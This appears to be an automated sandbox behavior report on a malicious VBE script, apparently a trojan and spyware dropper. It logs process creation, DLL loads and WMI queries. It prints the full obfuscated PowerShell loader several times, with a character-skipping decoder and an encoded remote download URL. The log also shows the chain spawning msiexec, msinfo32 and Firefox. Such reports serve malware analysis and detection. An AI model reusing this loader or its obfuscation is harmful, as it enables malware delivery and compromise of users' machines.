          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBE@17/8@4/3
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Nationalsocialisternes.SkaJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkhvrw3x.skq.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1068
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5812
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Narudzba ACH0036173.vbeReversingLabs: Detection: 26%
          Source: Narudzba ACH0036173.vbeVirustotal: Detection: 11%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Narudzba ACH0036173.vbe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadi
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lediggang Graadighedens Disciplineringer Bagermestrene Teutonisk Uptilt #>;$Spegeplserne='Nymaledes';<#Messiness Compromising Anaphalis Gennemarbejdelsen Fodervikkerne #>;$Laparotomize140=$host.'PrivateData';If ($Laparotomize140) {$Trikotagefabrikker++;}function Spdbarnsplejerens($Ledningernes){$Annelism=$Totlafholdenhed61+$Ledningernes.Length-$Trikotagefabrikker; for( $Omgik=7;$Omgik -lt $Annelism;$Omgik+=8){$Methodisers='Exuscitate';$Protaspis+=$Ledningernes[$Omgik];$Newsroom204='Dkfjers';}$Protaspis;}function Optllingslister($baulky){ & ($Unark) ($baulky);}$Steamboating=Spdbarnsplejerens 'MouthfuMDecollaoUarb,jdzRaabaaniUdf ldelundertilAntipreaNebra.k/Averrab5stedbrd.Faglrer0 Ful,vr Blottel(Porch dWB taliniAfgangsnRati,nedPopuliso Ove clwAllokatsBegnawn HjertebN Kal etTTempl r Materia1Haunche0Waylanr. instit0Gri tmi;Departe c araciW,uccubei.aftkjonandest 6Eardro 4 Increa; Delege Finansrx Uterom6 mysti 4Fgtmedd;a,reste barramurMacroptvKonvolu:Re ligh1 Graph 2Argenti1Delubru.Apace a0Bebutto)Lystbaa unquietG Spelmae TwelfhcAttak ekSkamrdmoQuantis/Persona2Hemidom0Noggkas1 Nonchr0,anebry0Jaszmal1Futu is0Ud lugt1 Arquat BararmFLikenesiQuizzysrIchthyoeLuncherfOzoniz.oRaastofx.hefmgl/Gra,bea1Aym sar2 Fje,ne1.ongrat.Andelss0No merc ';$Railcard=Spdbarnsplejerens 'syltdepuSoapfissdkningsESvartidRRidning- Er,rinA PainkigOverophE GustinN NegatiTForkerk ';$Ekspatrieret=Spdbarnsplejerens 'Bille thG,ilingtThrenodtBibliotpNonevilsSkydere:Evangel/ mpetu/ Fili,tp DatostuSpecialb Blomme-Tremour2pladshof Achi l7Nipsetsd Quater0 upersu7gagered1Vgtford5 Repr.f3,nakepreGreeneraHousefl1ev kost4 B.odsp0Moduler3Ansamle1Jengene8Sockhea4 leopardStengun6Bioscie2Tonikum2U,ifiab6Skammel6Litigatd Ind kr9unperv.cAfisnin2Regiona8theodraeAngolan4S hoolb1 Thelyt. StavnsrTeleotr2T pefli.drmmebid ConspieMicrotovTopchef/UdlistnnTaagetmePennyspdDr gbolkRiddersoTrvlerng KrgendeRecan.e. betacim Kruspes DeadmeoHusass ';$Overrigidness=Spdbarnsplejerens 'Soapyre>Indsnus ';$Unark=Spdbarnsplejerens 'Terningi,vergeneSlank ixKaosets ';$Metaprescutum='Caddises';$Arkivskab='\Nationalsocialisternes.Ska';Optllingslister (Spdbarnsplejerens 'Uhjlpso$BepaidlgBetali lRea izaoDisser,bEspartoATyr fgtlKlderen:Cebid nm ogejome S ppreKPapembaa Oblig.NklinikliBankemaShaplontMo dsgnieFinlandRHenns.n= N.trog$ ego,seEPlasmasn.ultideVIllegit:Bu.kladApel,rgoPRakitispQuincyuD GuidebA antasiTThomisiAUnhands+wasabis$Racial,aN nsurgRUnmercekForsortiDolomitVAmn,monS Et,opikBulwarkAPungpebbBowkerb ');Optllingslister (Spdbarnsplejerens 'Excla,m$KronpriGOpvaskelStumbleO otulisB Forma,aSulfosrLDiscolo: NightiITendo.oNUnwiseqd Libra i BesselSpakhusetWindburi PneumoNE,rthwacAdaptivtAgranulNFlambeeESlingreSAnnot tsUdv elg= Orchit$UncapiteLinj,skKReflektsBleeralPEnta glAKannikkTBedstevRIagttagiSnotdumEnabofamrnostalgePara.phTAcrolog.Reak orSB listip pologeLRhipidoI esidenTDonnere(Hematoz$zenithwoRadiJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677eJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
          Source: C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
